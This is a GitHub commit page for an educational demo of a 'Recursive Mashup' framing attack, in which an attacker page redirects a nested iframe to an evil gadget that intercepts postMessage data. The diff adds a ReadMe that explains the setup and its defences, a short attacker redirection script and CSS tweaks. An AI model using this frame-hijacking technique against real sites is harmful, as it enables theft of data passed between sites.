Browse files

Modified styles, included readme

  • Loading branch information...
1 parent 1d125b0 commit bc2a96b481712fb3c5aac83b3d0583bab1740413 @novogeek committed Feb 20, 2012
Showing with 38 additions and 6 deletions.
  1. +11 −0 ReadMe
  2. +5 −0 attacker/gadget.html
  3. +4 −3 attacker/index.html
  4. +4 −0 partner/index.html
  5. +7 −1 postMessage/SOP.html
  6. +7 −2 postMessage/StyleSheet.css
View
11 ReadMe
@@ -0,0 +1,11 @@
+This demo shows how a frame phishing attack can be launched on iframes making use of "Descendent navigation policy" followed by web browsers. In this, data sent from a genuine site to its partner widget is stolen by the attacker using an evil widget.
+
+Setup: There are 3 folders-partner, postMessage and attacker. Host each of them at different origins (host them on different domains or point them to different port numbers).
+
+>>The partner site just listens to onmessage event and prints the data.
+
+>>The postMessage site contains an iframe to partner site and sends message to the partner using HTML5 postMessage API.
+
+>>The attacker site has an iframe to postMessage site. Once the postMessage site is loaded in iframe, it redirects the partner site iframe to an evil gadget. This frame navigation is possible due to the "Descendent policy" followed by web browsers. Now, if the postMessage site sends a message to partner, it is actually reached to the evil gadget!!
+
+This particular framing attack is called "Recursive Mashup attack". To prevent this attack, make sure your site uses frame busting techniques like JavaScript redirection or sending X-Frame-Options response header.
View
5 attacker/gadget.html
@@ -2,6 +2,11 @@
<html>
<head>
<title>Attacker's Gadget-1</title>
+<style>
+body{
+background-color: #F7819F;
+}
+</style>
<script language="javascript">
window.onload = function () {
//code for stealing messages.
View
7 attacker/index.html
@@ -6,15 +6,15 @@
window.onload = function () {
var ifrAttacker = document.getElementById("ifrAttacker");
var ifrPartner = ifrAttacker.contentWindow.document.getElementById("ifrPartner");
+ //Uncomment the below code to execute Recursive mashup attack.
ifrPartner.src = "http://localhost:1337/gadget.html"
- //ifrPartner.location.href = "http://localhost:1337/gadget.html"
}
</script>
</head>
<body>
-<h3> Attacker site!</h3>
-<iframe id="ifrAttacker" width="400px" height="400px" src="http://localhost/postMessage/index.html"></iframe>
+<h3> Attacker site - Recursive Mashup Attack!</h3>
+<iframe id="ifrAttacker" width="330px" height="230px" src="http://localhost/postMessage/index.html"></iframe>
<!--
<fieldset>
@@ -23,5 +23,6 @@
<iframe id="ifrGadget3" src="http://localhost:81/"></iframe>
</fieldset>
-->
+
</body>
</html>
View
4 partner/index.html
@@ -2,6 +2,10 @@
<html>
<head>
<title>Partner Website</title>
+<style>
+body{background-color: #CEE3F6;}
+</style>
+
<script language="javascript" type="text/javascript">
window.onload = function () {
window.onmessage = function (e) {
View
8 postMessage/SOP.html
@@ -27,7 +27,13 @@
<legend>Same Origin Policy Test!</legend>
<label for="txtAjaxTest">Ajax URL: </label> <input type="text" id="txtAjaxTest" value="local.html" />
<input type="button" id="btnAjaxTest" value="Ajax Test"/>
- <div id="testDiv" class="container"></div>
+ <div id="testDiv" class="container"></div>
+<div> </br></br>
+Framing http://google.com
+<iframe src="http://google.com" width="330px"></iframe></div>
+<div></br></br>
+Framing http://m.google.com
+<iframe src="http://m.google.com" width="330px"></iframe></div>
</fieldset>
</body>
</html>
View
9 postMessage/StyleSheet.css
@@ -1,4 +1,8 @@
-fieldset
+body{
+ background-color:#819FF7;
+}
+
+fieldset
{
margin-top: 30px;
padding: 20px;
@@ -11,4 +15,5 @@
margin: 10px 0px 0px 0px;
padding: 20px;
-}
+}
+

0 comments on commit bc2a96b

Please sign in to comment.